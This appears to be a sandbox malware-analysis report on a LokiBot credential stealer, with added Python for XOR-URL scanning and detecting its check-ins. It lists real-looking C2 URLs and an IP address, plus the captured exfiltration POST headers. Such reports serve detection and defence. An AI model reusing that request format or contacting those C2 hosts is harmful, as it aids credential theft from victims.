Windows Analysis Report U001P56ybm.exe

Overview

General Information

Sample Name: U001P56ybm.exe
Analysis ID: 528740
MD5: 969e2ccfcacf3573de922d9bce81e3fd
SHA1: c3dd33a00d4dad9330d0c2dbc0c3b75396c70f8b
SHA256: 4a059628d9f56799d68937821b355477502fe0704d41a75c372b1c036061d59f
Tags: exe, Loki

Detection

Lokibot
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • U001P56ybm.exe (PID: 4640 cmdline: "C:\Users\user\Desktop\U001P56ybm.exe" MD5: 969E2CCFCACF3573DE922D9BCE81E3FD)
    • U001P56ybm.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\U001P56ybm.exe" MD5: 969E2CCFCACF3573DE922D9BCE81E3FD)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings, where reported, are listed under the row)
00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp | Loki_1 | Loki Payload | kevoreilly
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x13bff:$des3: 68 03 66 00 00 (push 0x6603, the CryptoAPI CALG_3DES algorithm identifier)
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00 (bytes 46..75 are the ASCII string "Fuckav.ru")
(36 entries in total; only the first five are shown here)

Unpacked PEs

Source | Rule | Description | Author (matched strings, where reported, are listed under the row)
2.0.U001P56ybm.exe.400000.6.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 (this is "http://" XORed with the single byte 0xFF; the two $s1 hits above coincide with plaintext $f1 hits and are not XORed)
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
2.0.U001P56ybm.exe.400000.6.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.0.U001P56ybm.exe.400000.6.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
2.0.U001P56ybm.exe.400000.6.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
2.0.U001P56ybm.exe.400000.6.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x13ffc:$a2: last_compatible_version
(82 entries in total; only the first five are shown here)
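The SUSP_XORed_URL_in_EXE hits above deserve a second look before they go into a report: YARA's xor modifier includes key 0x00, so the $s1 matches at 0x13e78 and 0x17633 are the same plaintext strings that $f1 found, and only the seven bytes at 0x18074 are a genuinely XORed URL. The Python below is an added example, not part of the Joe Sandbox report and not the rule author's code. It recovers the single-byte key from the known "http://" prefix (REPORT_MATCH is the only value taken from the report) and then does what the rule does in a more useful form: scans a buffer for both URL prefixes under all 256 keys and extends each hit while the decoded bytes stay printable, so the full URL comes out rather than just its prefix. SAMPLE_BUFFER and the URLs inside it are constructed for the example.

```python
"""Single-byte-XOR URL scan and key recovery, after the SUSP_XORed_URL_in_EXE idea."""
from __future__ import annotations

URL_PREFIXES = (b"http://", b"https://")

# The seven bytes the rule matched at 0x18074 in this sample (copied from the report).
REPORT_MATCH = b"\x97\x8B\x8B\x8F\xC5\xD0\xD0"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the only 'cipher' involved here)."""
    return bytes(b ^ key for b in data)


def recover_key(cipher: bytes, known_plain: bytes = b"http://") -> int | None:
    """Known-plaintext attack on single-byte XOR: each byte must yield the same key.
    Returns None when the bytes disagree, i.e. this is not a single-byte XOR of known_plain."""
    keys = {c ^ p for c, p in zip(cipher, known_plain)}
    return keys.pop() if len(keys) == 1 else None


def find_xored_urls(buf: bytes, max_len: int = 256) -> list[tuple[int, int, bytes]]:
    """Return (offset, key, decoded_url) for every URL prefix found under any single-byte key.

    Key 0x00 is the plaintext case, so plaintext URLs are reported too (exactly as the YARA
    rule does). After matching the prefix, the hit is extended forward while the decoded byte
    is printable, non-space ASCII, which recovers the rest of the URL under the same key.
    """
    hits: set[tuple[int, int, bytes]] = set()
    for key in range(256):
        for prefix in URL_PREFIXES:
            needle = xor_bytes(prefix, key)
            start = 0
            while (pos := buf.find(needle, start)) != -1:
                end = pos
                while end < len(buf) and end - pos < max_len and 0x21 <= (buf[end] ^ key) <= 0x7E:
                    end += 1
                hits.add((pos, key, xor_bytes(buf[pos:end], key)))
                start = pos + 1
    return sorted(hits)


# Constructed test buffer (not taken from the sample): one plaintext URL, one URL XORed with
# 0xFF like the report's match, and one under an arbitrary key, separated by padding whose
# decoded form is non-printable so the extension stops where the URL ends.
SAMPLE_BUFFER = (
    b"\x00" * 16
    + b"https://example.invalid/login" + b"\x00" * 9
    + xor_bytes(b"http://c2.invalid/alien/fre.php", 0xFF) + b"\x00" * 8
    + xor_bytes(b"http://c2.invalid/gate", 0x35) + b"\xFF" * 8
)


if __name__ == "__main__":
    key = recover_key(REPORT_MATCH)
    print(f"report match decodes with key 0x{key:02X}: {xor_bytes(REPORT_MATCH, key)!r}")
    for offset, k, url in find_xored_urls(SAMPLE_BUFFER):
        print(f"0x{offset:05x} key=0x{k:02X} {url.decode()}")
```

Run it against a memory dump or the unpacked PE (read the file into `buf`) and filter out key 0x00 hits to get the list of deliberately hidden URLs; for a real binary the 256-key scan is still a handful of `bytes.find` passes and finishes in well under a second.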

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Multi AV Scanner detection for submitted file
Source: U001P56ybm.exe | ReversingLabs: Detection: 25%
Antivirus detection for URL or domain
Source: http://194.85.248.167/imt/fre.php | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll | ReversingLabs: Detection: 22%
Antivirus or Machine Learning detection for unpacked file
Source: 2.0.U001P56ybm.exe.400000.0.unpack | Avira: Label: TR/Patched.Ren.Gen2
Uses 32bit PE files
Source: U001P56ybm.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Sources whose signature heading is missing from this export (debug-symbol path strings and directory-enumeration code):
Source: Binary string: wntdll.pdbUGP | source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb | source: U001P56ybm.exe, 00000000.00000003.282481147.0000000002990000.00000004.00000001.sdmp, U001P56ybm.exe, 00000000.00000003.289797489.0000000002B20000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS. All 203 alerts are between the analysis host 192.168.2.3 and the C2 server 194.85.248.167:80 and fall into two flow types; each type is listed once, together with the client ports on which it was raised.

Credential exfiltration flows (client ports 49744 and 49745), each raising:
  • 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 (192.168.2.3 -> 194.85.248.167:80)
  • 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) (192.168.2.3 -> 194.85.248.167:80)
  • 2025381 ET TROJAN LokiBot Checkin (192.168.2.3 -> 194.85.248.167:80)
  • 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 (192.168.2.3 -> 194.85.248.167:80)

C2 command-polling flows (39 flows; client ports 49746-49752, 49755-49763, 49765, 49766, 49769, 49770, 49785, 49809, 49813, 49814, 49817-49823, 49825, 49827, 49829, 49833, 49845, 49851, 49855, 49856), each raising:
  • 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 (192.168.2.3 -> 194.85.248.167:80)
  • 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) (192.168.2.3 -> 194.85.248.167:80)
  • 2025381 ET TROJAN LokiBot Checkin (192.168.2.3 -> 194.85.248.167:80)
  • 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 (192.168.2.3 -> 194.85.248.167:80)
  • 2025483 ET TROJAN LokiBot Fake 404 Response (194.85.248.167:80 -> 192.168.2.3)
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49857 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49857
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49858 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49858
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49859 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49859
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49860 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49860
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49861 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49861
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49862 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49862
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49863 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49863
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49865 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49865
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49866 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49866
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49867 -> 194.85.248.167:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 194.85.248.167:80 -> 192.168.2.3:49867
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor | URLs: http://alphastand.top/alien/fre.php
Source: Joe Sandbox View | ASN Name: DATACENTERRO DATACENTERRO
Source: global traffic | HTTP traffic detected (2 requests, Content-Length: 190):
  POST /imt/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 194.85.248.167
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 3D93679C
  Content-Length: 190
  Connection: close
Source: global traffic | HTTP traffic detected (49 requests, identical to the above except Content-Length: 163):
  POST /imt/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 194.85.248.167
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 3D93679C
  Content-Length: 163
  Connection: close
Source: unknown | TCP traffic detected without corresponding DNS query: 194.85.248.167 (reported 50 times; the C2 address is contacted directly by IP, no hostname is resolved first)
Source: U001P56ybm.exe, 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp | String found in binary or memory: http://194.85.248.167/imt/fre.php
Source: U001P56ybm.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: U001P56ybm.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: U001P56ybm.exe, U001P56ybm.exe, 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, U001P56ybm.exe, 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
Source: unknown | HTTP traffic detected:
  POST /imt/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: 194.85.248.167
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 3D93679C
  Content-Length: 190
  Connection: close
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 2_2_00404ED4 recv,
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
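The check-in request captured above and the "TCP traffic without corresponding DNS query" observation together describe what a network detection for this sample has to key on: an HTTP/1.0 POST with the Charon/Inferno User-Agent, the non-standard Content-Key header, Content-Encoding: binary, and a Host header that is a bare IP rather than a hostname. The following is an added example written for this report, not code from Joe Sandbox, Emerging Threats or the malware author: it parses raw HTTP request headers and flags those traits, so the Snort hits can be reproduced against a proxy log or PCAP export offline. Assumptions are marked in the code: the CRLF header separators (the report prints the headers run together), the eight-hex-digit shape of Content-Key (inferred from the single value 3D93679C seen here), and the benign comparison request, which is constructed.

```python
"""Flag LokiBot-style HTTP check-ins from raw request headers.

Added example for this analysis report; every assumption is marked inline.
"""
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed sample: the check-in shown in the report, with the CRLF header
# separators restored (the report lists the headers run together on one line).
SAMPLE_LOKIBOT_REQUEST = (
    "POST /imt/fre.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: 194.85.248.167\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: 3D93679C\r\n"
    "Content-Length: 163\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Constructed benign binary upload for contrast; not taken from the report.
SAMPLE_BENIGN_REQUEST = (
    "POST /api/upload HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Host: files.example.com\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 163\r\n"
    "\r\n"
)


@dataclass
class Verdict:
    suspicious: bool
    indicators: list = field(default_factory=list)


def parse_request(raw: str):
    """Split a raw HTTP request head into (method, path, version, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def host_is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare IP address (optionally with :port)."""
    if host.startswith("["):                      # IPv6 literal such as [2001:db8::1]:80
        hostname = host[1:host.find("]")]
    elif host.count(":") == 1:                    # IPv4 or hostname with a port
        hostname = host.rsplit(":", 1)[0]
    else:
        hostname = host
    try:
        ipaddress.ip_address(hostname)
        return True
    except ValueError:
        return False


def classify(raw: str) -> Verdict:
    """Score one request against the traits the report's Snort rules fire on."""
    method, path, version, headers = parse_request(raw)
    indicators = []

    ua = headers.get("user-agent", "").lower()
    ua_hit = "charon" in ua and "inferno" in ua   # the UA SID 2021641 keys on
    if ua_hit:
        indicators.append("User-Agent contains Charon/Inferno")

    # Content-Key is not a standard HTTP header. The 8-hex-digit pattern is an
    # assumption drawn from the single value (3D93679C) in this report.
    if re.fullmatch(r"[0-9A-Fa-f]{8}", headers.get("content-key", "")):
        indicators.append("Content-Key header with 8-hex-digit value")

    if headers.get("content-encoding", "").lower() == "binary":
        indicators.append("Content-Encoding: binary")

    if method == "POST" and version == "HTTP/1.0" and path.endswith("fre.php"):
        indicators.append("HTTP/1.0 POST to fre.php")

    # Corresponds to the report's 'TCP traffic without corresponding DNS query':
    # the bot carries the C2 as an IP literal, so no lookup precedes the POST.
    if host_is_ip_literal(headers.get("host", "")):
        indicators.append("Host is an IP literal")

    # The UA alone is high confidence; otherwise require several structural
    # traits to co-occur so a lone IP-literal Host does not raise an alert.
    return Verdict(ua_hit or len(indicators) >= 3, indicators)


if __name__ == "__main__":
    for name, req in (("lokibot", SAMPLE_LOKIBOT_REQUEST), ("benign", SAMPLE_BENIGN_REQUEST)):
        print(name, classify(req))
```

Run it as a script to see both verdicts, or import `classify` and feed it each request head pulled from a proxy log. The threshold is deliberately conservative: Content-Encoding: binary or a bare-IP Host on its own is common enough in legitimate traffic that only the Charon/Inferno User-Agent is treated as sufficient by itself.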

              System Summary:

Malicious sample detected (through community Yara rule)
Source: the following memory dumps, type: UNPACKEDPE | Matched rules: "Loki Payload" (Author: kevoreilly) and "detect Lokibot in memory" (Author: JPCERT/CC Incident Response Group); every dump listed matched both rules:
  2.0.U001P56ybm.exe.400000.6.unpack
  2.2.U001P56ybm.exe.400000.0.unpack
  2.2.U001P56ybm.exe.400000.0.raw.unpack
  0.2.U001P56ybm.exe.2430000.1.raw.unpack
  2.0.U001P56ybm.exe.400000.4.unpack
  2.0.U001P56ybm.exe.400000.5.raw.unpack
  2.0.U001P56ybm.exe.400000.3.raw.unpack
  2.0.U001P56ybm.exe.400000.4.raw.unpack
  2.0.U001P56ybm.exe.400000.6.raw.unpack
  2.0.U001P56ybm.exe.400000.2.unpack
  2.1.U001P56ybm.exe.400000.0.raw.unpack
  2.0.U001P56ybm.exe.400000.5.unpack
  0.2.U001P56ybm.exe.2430000.1.unpack
  2.0.U001P56ybm.exe.400000.1.unpack
  2.0.U001P56ybm.exe.400000.3.unpack
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: U001P56ybm.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE | date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Lokibot | hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 | author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
